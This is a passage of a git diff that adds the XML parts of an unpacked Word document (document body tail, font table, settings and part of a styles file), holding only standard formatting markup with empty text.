Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/><w:lang w:eastAsia="en-GB"/></w:rPr><w:t> </w:t></w:r></w:p><w:p w14:paraId="7D569F4A" w14:textId="77777777" w:rsidR="00642844" w:rsidRDefault="007E0FA4"><w:pPr><w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/><w:lang w:eastAsia="en-GB"/></w:rPr></w:pPr><w:r><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/><w:lang w:eastAsia="en-GB"/></w:rPr><w:t></w:t></w:r><w:r><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/><w:lang w:eastAsia="en-GB"/></w:rPr><w:t> </w:t></w:r></w:p><w:p w14:paraId="7F29C926" w14:textId="77777777" w:rsidR="00642844" w:rsidRDefault="007E0FA4"><w:pPr><w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/><w:lang w:eastAsia="en-GB"/></w:rPr></w:pPr><w:r><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/><w:lang w:eastAsia="en-GB"/></w:rPr><w:t xml:space="preserve"></w:t></w:r><w:r><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/><w:lang w:eastAsia="en-GB"/></w:rPr><w:t></w:t></w:r></w:p><w:p w14:paraId="0116ACF9" w14:textId="77777777" w:rsidR="00642844" w:rsidRDefault="007E0FA4"><w:pPr><w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/><w:lang w:eastAsia="en-GB"/></w:rPr></w:pPr><w:r><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/><w:lang w:eastAsia="en-GB"/></w:rPr><w:t></w:t></w:r></w:p><w:p w14:paraId="5DF66ACD" w14:textId="77777777" w:rsidR="00642844" w:rsidRDefault="007E0FA4"><w:pPr><w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/><w:lang w:eastAsia="en-GB"/></w:rPr></w:pPr><w:r><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/><w:lang w:eastAsia="en-GB"/></w:rPr><w:t> </w:t></w:r></w:p><w:p w14:paraId="516C29F7" w14:textId="77777777" w:rsidR="00642844" w:rsidRDefault="007E0FA4"><w:pPr><w:pStyle w:val="BodyText"/><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/></w:rPr></w:pPr><w:r><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/></w:rPr><w:t></w:t></w:r></w:p><w:p w14:paraId="3D92D8D3" w14:textId="77777777" w:rsidR="00642844" w:rsidRDefault="007E0FA4"><w:pPr><w:pStyle w:val="BodyText"/><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/></w:rPr></w:pPr><w:r><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/></w:rPr><w:t></w:t></w:r></w:p><w:p w14:paraId="4594E64D" w14:textId="77777777" w:rsidR="00642844" w:rsidRDefault="007E0FA4"><w:pPr><w:pStyle w:val="BodyText"/><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/></w:rPr></w:pPr><w:r><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/></w:rPr><w:t></w:t></w:r></w:p><w:p w14:paraId="7C53F508" w14:textId="77777777" w:rsidR="00642844" w:rsidRDefault="007E0FA4"><w:pPr><w:pStyle w:val="BodyText"/><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/></w:rPr></w:pPr><w:proofErr w:type="spellStart"/><w:r><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/></w:rPr><w:t></w:t></w:r><w:proofErr w:type="spellEnd"/></w:p><w:p w14:paraId="3BEC24AD" w14:textId="77777777" w:rsidR="00642844" w:rsidRDefault="007E0FA4"><w:pPr><w:pStyle w:val="BodyText"/></w:pPr><w:r><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/></w:rPr><w:t></w:t></w:r></w:p><w:sectPr w:rsidR="00642844"><w:pgSz w:w="11906" w:h="16838"/><w:pgMar w:top="1418" w:right="1418" w:bottom="1418" w:left="1418" w:header="0" w:footer="0" w:gutter="0"/><w:cols w:space="720"/><w:formProt w:val="0"/><w:docGrid w:linePitch="100" w:charSpace="4096"/></w:sectPr></w:body></w:document>
\ No newline at end of file
diff --git a/data/word_dat/word/fontTable.xml b/data/word_dat/word/fontTable.xml
new file mode 100644
index 0000000..26e2a1a
--- /dev/null
+++ b/data/word_dat/word/fontTable.xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<w:fonts xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid"><w:font w:name="Calibri"><w:panose1 w:val="020F0502020204030204"/><w:charset w:val="00"/><w:family w:val="swiss"/><w:pitch w:val="variable"/><w:sig w:usb0="E0002EFF" w:usb1="C000247B" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/></w:font><w:font w:name="Trebuchet MS"><w:panose1 w:val="020B0603020202020204"/><w:charset w:val="00"/><w:family w:val="swiss"/><w:pitch w:val="variable"/><w:sig w:usb0="00000687" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="0000009F" w:csb1="00000000"/></w:font><w:font w:name="Times New Roman"><w:panose1 w:val="02020603050405020304"/><w:charset w:val="00"/><w:family w:val="roman"/><w:pitch w:val="variable"/><w:sig w:usb0="E0002EFF" w:usb1="C000785B" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/></w:font><w:font w:name="OpenSymbol"><w:altName w:val="Cambria"/><w:charset w:val="01"/><w:family w:val="roman"/><w:pitch w:val="variable"/></w:font><w:font w:name="Liberation Sans"><w:altName w:val="Arial"/><w:charset w:val="01"/><w:family w:val="roman"/><w:pitch w:val="variable"/></w:font><w:font w:name="Droid Sans Fallback"><w:panose1 w:val="00000000000000000000"/><w:charset w:val="00"/><w:family w:val="roman"/><w:notTrueType/><w:pitch w:val="default"/></w:font><w:font w:name="Droid Sans Devanagari"><w:altName w:val="Segoe UI"/><w:panose1 w:val="00000000000000000000"/><w:charset w:val="00"/><w:family w:val="roman"/><w:notTrueType/><w:pitch w:val="default"/></w:font><w:font w:name="Cambria"><w:panose1 w:val="02040503050406030204"/><w:charset w:val="00"/><w:family w:val="roman"/><w:pitch w:val="variable"/><w:sig w:usb0="E00006FF" w:usb1="420024FF" w:usb2="02000000" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/></w:font></w:fonts>
\ No newline at end of file
diff --git a/data/word_dat/word/settings.xml b/data/word_dat/word/settings.xml
new file mode 100644
index 0000000..e1849a7
--- /dev/null
+++ b/data/word_dat/word/settings.xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<w:settings xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:sl="http://schemas.openxmlformats.org/schemaLibrary/2006/main" mc:Ignorable="w14 w15 w16se w16cid"><w:zoom w:percent="100"/><w:proofState w:spelling="clean" w:grammar="clean"/><w:defaultTabStop w:val="720"/><w:autoHyphenation/><w:characterSpacingControl w:val="doNotCompress"/><w:compat><w:compatSetting w:name="compatibilityMode" w:uri="http://schemas.microsoft.com/office/word" w:val="14"/><w:compatSetting w:name="overrideTableStyleFontSizeAndJustification" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/><w:compatSetting w:name="enableOpenTypeFeatures" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/><w:compatSetting w:name="doNotFlipMirrorIndents" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/><w:compatSetting w:name="useWord2013TrackBottomHyphenation" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/></w:compat><w:rsids><w:rsidRoot w:val="00642844"/><w:rsid w:val="00642844"/><w:rsid w:val="007E0FA4"/></w:rsids><m:mathPr><m:mathFont m:val="Cambria Math"/><m:brkBin m:val="before"/><m:brkBinSub m:val="--"/><m:smallFrac m:val="0"/><m:dispDef/><m:lMargin m:val="0"/><m:rMargin m:val="0"/><m:defJc m:val="centerGroup"/><m:wrapIndent m:val="1440"/><m:intLim m:val="subSup"/><m:naryLim m:val="undOvr"/></m:mathPr><w:themeFontLang w:val="en-US" w:eastAsia="" w:bidi=""/><w:clrSchemeMapping w:bg1="light1" w:t1="dark1" w:bg2="light2" w:t2="dark2" w:accent1="accent1" w:accent2="accent2" w:accent3="accent3" w:accent4="accent4" w:accent5="accent5" w:accent6="accent6" w:hyperlink="hyperlink" w:followedHyperlink="followedHyperlink"/><w:shapeDefaults><o:shapedefaults v:ext="edit" spidmax="1026"/><o:shapelayout v:ext="edit"><o:idmap v:ext="edit" data="1"/></o:shapelayout></w:shapeDefaults><w:decimalSymbol w:val="."/><w:listSeparator w:val=","/><w14:docId w14:val="74811FD2"/><w15:docId w15:val="{9951342C-DC33-4E0E-84C6-943EC8FBAAD2}"/></w:settings>
\ No newline at end of file
diff --git a/data/word_dat/word/styles.xml b/data/word_dat/word/styles.xml
new file mode 100644
index 0000000..fb5bc24
--- /dev/null
+++ b/data/word_dat/word/styles.xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid"><w:docDefaults><w:rPrDefault><w:rPr><w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/><w:sz w:val="22"/><w:szCs w:val="22"/><w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/></w:rPr></w:rPrDefault><w:pPrDefault><w:pPr><w:suppressAutoHyphens/></w:pPr></w:pPrDefault></w:docDefaults><w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="0" w:defUnhideWhenUsed="0" w:defQFormat="0" w:count="375"><w:lsdException w:name="Normal" w:uiPriority="0" w:qFormat="1"/><w:lsdException w:name="heading 1" w:uiPriority="9" w:qFormat="1"/><w:lsdException w:name="heading 2" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/><w:lsdException w:name="heading 3" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/><w:lsdException w:name="heading 4" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/><w:lsdException w:name="heading 5" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/><w:lsdException w:name="heading 6" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/><w:lsdException w:name="heading 7" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/><w:lsdException w:name="heading 8" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/><w:lsdException w:name="heading 9" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/><w:lsdException w:name="index 1" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="index 2" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="index 3" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="index 4" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="index 5" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="index 6" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="index 7" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="index 8" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="index 9" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="toc 1" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/><w:lsdException w:name="toc 2" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/><w:lsdException w:name="toc 3" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/><w:lsdException w:name="toc 4" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/><w:lsdException w:name="toc 5" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/><w:lsdException w:name="toc 6" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/><w:lsdException w:name="toc 7" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/><w:lsdException w:name="toc 8" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/><w:lsdException w:name="toc 9" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/><w:lsdException w:name="Normal Indent" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="footnote text" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="annotation text" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="header" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="footer" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="index heading" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="caption" w:semiHidden="1" w:uiPriority="35" w:unhideWhenUsed="1" w:qFormat="1"/><w:lsdException w:name="table of figures" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="envelope address" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="envelope return" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="footnote reference" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="annotation reference" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="line number" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="page number" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="endnote reference" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="endnote text" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="table of authorities" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="macro" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="toa heading" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="List" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="List Bullet" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="List Number" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="List 2" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="List 3" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="List 4" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="List 5" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="List Bullet 2" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="List Bullet 3" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="List Bullet 4" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="List Bullet 5" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="List Number 2" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="List Number 3" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="List Number 4" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="List Number 5" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Title" w:uiPriority="10" w:qFormat="1"/><w:lsdException w:name="Closing" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Signature" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Default Paragraph Font" w:semiHidden="1" w:uiPriority="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Body Text" w:semiHidden="1" w:uiPriority="0" w:unhideWhenUsed="1"/><w:lsdException w:name="Body Text Indent" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="List Continue" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="List Continue 2" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="List Continue 3" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="List Continue 4" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="List Continue 5" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Message Header" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Subtitle" w:uiPriority="11" w:qFormat="1"/><w:lsdException w:name="Salutation" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Date" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Body Text First Indent" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Body Text First Indent 2" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Note Heading" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Body Text 2" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Body Text 3" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Body Text Indent 2" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Body Text Indent 3" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Block Text" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Hyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="FollowedHyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Strong" w:uiPriority="22" w:qFormat="1"/><w:lsdException w:name="Emphasis" w:uiPriority="20" w:qFormat="1"/><w:lsdException w:name="Document Map" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Plain Text" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="E-mail Signature" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="HTML Top of Form" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="HTML Bottom of Form" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Normal (Web)" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="HTML Acronym" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="HTML Address" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="HTML Cite" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="HTML Code" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="HTML Definition" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="HTML Keyboard" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="HTML Preformatted" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="HTML Sample" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="HTML Typewriter" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="HTML Variable" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Normal Table" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="annotation subject" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="No List" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Outline List 1" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Outline List 2" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Outline List 3" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Simple 1" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Simple 2" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Simple 3" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Classic 1" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Classic 2" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Classic 3" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Classic 4" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Colorful 1" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Colorful 2" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Colorful 3" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Columns 1" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Columns 2" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Columns 3" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Columns 4" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Columns 5" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Grid 1" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Grid 2" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Grid 3" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Grid 4" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Grid 5" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Grid 6" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Grid 7" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Grid 8" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table List 1" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table List 2" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table List 3" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table List 4" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table List 5" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table List 6" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table List 7" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table List 8" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table 3D effects 1" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table 3D effects 2" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table 3D effects 3" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Contemporary" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Elegant" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Professional" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Subtle 1" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Subtle 2" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Web 1" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Web 2" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Web 3" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Balloon Text" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Grid" w:semiHidden="1" w:uiPriority="59" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Theme" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Placeholder Text" w:semiHidden="1"/><w:lsdException w:name="No Spacing" w:uiPriority="1" w:qFormat="1"/><w:lsdException w:name="Light Shading" w:uiPriority="60"/><w:lsdException w:name="Light List" w:uiPriority="61"/><w:lsdException w:name="Light Grid" w:uiPriority="62"/><w:lsdException w:name="Medium Shading 1" w:uiPriority="63"/><w:lsdException w:name="Medium Shading 2" w:uiPriority="64"/><w:lsdException w:name="Medium List 1" w:uiPriority="65"/><w:lsdException w:name="Medium List 2" w:uiPriority="66"/><w:lsdException w:name="Medium Grid 1" w:uiPriority="67"/><w:lsdException w:name="Medium Grid 2" w:uiPriority="68"/><w:lsdException w:name="Medium Grid 3" w:uiPriority="69"/><w:lsdException w:name="Dark List" w:uiPriority="70"/><w:lsdException w:name="Colorful Shading" w:uiPriority="71"/><w:lsdException w:name="Colorful List" w:uiPriority="72"/><w:lsdException w:name="Colorful Grid" w:uiPriority="73"/><w:lsdException w:name="Light Shading Accent 1" w:uiPriority="60"/><w:lsdException w:name="Light List Accent 1" w:uiPriority="61"/><w:lsdException w:name="Light Grid Accent 1" w:uiPriority="62"/><w:lsdException w:name="Medium Shading 1 Accent 1" w:uiPriority="63"/><w:lsdException w:name="Medium Shading 2 Accent 1" w:uiPriority="64"/><w:lsdException w:name="Medium List 1 Accent 1" w:uiPriority="65"/><w:lsdException w:name="Revision" w:semiHidden="1"/><w:lsdException w:name="List Paragraph" w:uiPriority="34" w:qFormat="1"/><w:lsdException w:name="Quote" w:uiPriority="29" w:qFormat="1"/><w:lsdException w:name="Intense Quote" w:uiPriority="30" w:qFormat="1"/><w:lsdException w:name="Medium List 2 Accent 1" w:uiPriority="66"/><w:lsdException w:name="Medium Grid 1 Accent 1" w:uiPriority="67"/><w:lsdException w:name="Medium Grid 2 Accent 1" w:uiPriority="68"/><w:lsdException w:name="Medium Grid 3 Accent 1" w:uiPriority="69"/><w:lsdException w:name="Dark List Accent 1" w:uiPriority="70"/><w:lsdException w:name="Colorful Shading Accent 1" w:uiPriority="71"/><w:lsdException w:name="Colorful List Accent 1" w:uiPriority="72"/><w:lsdException w:name="Colorful Grid Accent 1" w:uiPriority="73"/><w:lsdException w:name="Light Shading Accent 2" w:uiPriority="60"/><w:lsdException w:name="Light List Accent 2" w:uiPriority="61"/><w:lsdException w:name="Light Grid Accent 2" w:uiPriority="62"/><w:lsdException w:name="Medium Shading 1 Accent 2" w:uiPriority="63"/><w:lsdException w:name="Medium Shading 2 Accent 2" w:uiPriority="64"/><w:lsdException w:name="Medium List 1 Accent 2" w:uiPriority="65"/><w:lsdException w:name="Medium List 2 Accent 2" w:uiPriority="66"/><w:lsdException w:name="Medium Grid 1 Accent 2" w:uiPriority="67"/><w:lsdException w:name="Medium Grid 2 Accent 2" w:uiPriority="68"/><w:lsdException w:name="Medium Grid 3 Accent 2" w:uiPriority="69"/><w:lsdException w:name="Dark List Accent 2" w:uiPriority="70"/><w:lsdException w:name="Colorful Shading Accent 2" w:uiPriority="71"/><w:lsdException w:name="Colorful List Accent 2" w:uiPriority="72"/><w:lsdException 